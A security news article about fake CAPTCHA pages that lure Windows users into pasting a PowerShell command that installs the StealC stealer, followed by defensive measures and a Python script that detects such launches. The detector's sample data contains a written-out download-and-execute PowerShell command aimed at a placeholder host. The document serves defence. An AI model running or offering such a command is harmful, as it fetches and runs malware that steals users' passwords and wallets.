Hackers used fake CAPTCHA pages to spread malware on Windows
How attackers use fake CAPTCHA pages
Researchers have discovered a vulnerability that allows hackers to trick Windows users into running a malicious PowerShell script. The script, called Stealthy StealC Information Stealer, steals browser data, cryptocurrency wallet passwords, and Steam and Outlook accounts, then sends all of it, along with screenshots, to a command-and-control server.
What happens during the attack?
1. Fake CAPTCHA pages
Hackers place a counterfeit verification interface that looks like a normal CAPTCHA page. On these pages the user sees a “prompt” to press Windows + R (open the Run dialog) and then Ctrl + V (paste from clipboard).
2. Launching PowerShell from the clipboard
An executable PowerShell script is preloaded into the clipboard. The user, following the instruction, runs it manually without realizing its malicious nature.
3. Downloading and spreading code
After launch, the script connects to a remote server and downloads additional malware. Traffic is encrypted with RC4, making it harder to detect with standard security tools.
Why is this dangerous?
- Bypassing traditional defenses – normal file‑download blocking mechanisms may not work because the script is already running in the system.
- Wide range of stolen data – from browser passwords to cryptocurrency keys and accounts on popular services.
- Invisibility to the user – the action looks like a routine security check, not malware execution.
How to protect yourself?
| Measure | What it does |
|---|---|
| Limit PowerShell usage | Set policies that prohibit running unsigned scripts. |
| Windows application control | Enable AppLocker or an equivalent program‑execution control system. |
| Outgoing traffic monitoring | Track suspicious connections (e.g., HTTP traffic encrypted with RC4) and block them. |
By following these recommendations, you can significantly reduce the risk of a user becoming a victim of such an attack.
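The attack steps above leave a recognizable trace in process-creation logs: a script host started by explorer.exe (the process that owns the Run dialog) with download-and-execute traits on its command line. The following is an added detection sketch, not code from the research described here; the event field names, indicator list, weights and threshold are assumptions to adapt to your own telemetry.

```python
import re

# Assumed list of script hosts worth watching; extend for your environment.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# (regex, weight, reason): assumed heuristics, not taken from the article.
INDICATORS = [
    (r"(?i)-w(in(dowstyle)?)?\s+h(idden)?\b", 2, "hidden window"),
    (r"(?i)-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", 2, "encoded command"),
    (r"(?i)\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", 2, "network fetch"),
    (r"(?i)\b(iex|invoke-expression)\b", 2, "in-memory execution"),
]

def basename(path):
    # Lower-cased file name taken from a Windows path.
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event):
    """Score one process-creation event; returns (score, reasons)."""
    # The Run dialog belongs to explorer.exe, so pasted commands appear as its children.
    if (basename(event["parent_image"]) != "explorer.exe"
            or basename(event["image"]) not in SCRIPT_HOSTS):
        return 0, []
    score, reasons = 1, ["script host started by explorer.exe"]
    for pattern, weight, reason in INDICATORS:
        if re.search(pattern, event["command_line"]):
            score += weight
            reasons.append(reason)
    return score, reasons

def triage(events, threshold=4):
    """Return (host, score, reasons) for events at or above the threshold."""
    scored = [(e["host"], *score_event(e)) for e in events]
    return [hit for hit in scored if hit[1] >= threshold]

# Constructed sample events (not real telemetry); example.invalid never resolves.
SAMPLE_EVENTS = [
    {"host": "WS-01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -c "iex (iwr https://example.invalid/a)"'},
    {"host": "WS-02", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe"},
    {"host": "WS-03", "parent_image": r"C:\Program Files\Mgmt\agent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -w hidden -c iwr https://example.invalid/inventory"},
]

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

Only WS-01 is flagged: WS-02 is a plain interactive shell opened from explorer.exe, and WS-03 has the same command-line traits but a management agent as parent, so neither reaches the threshold.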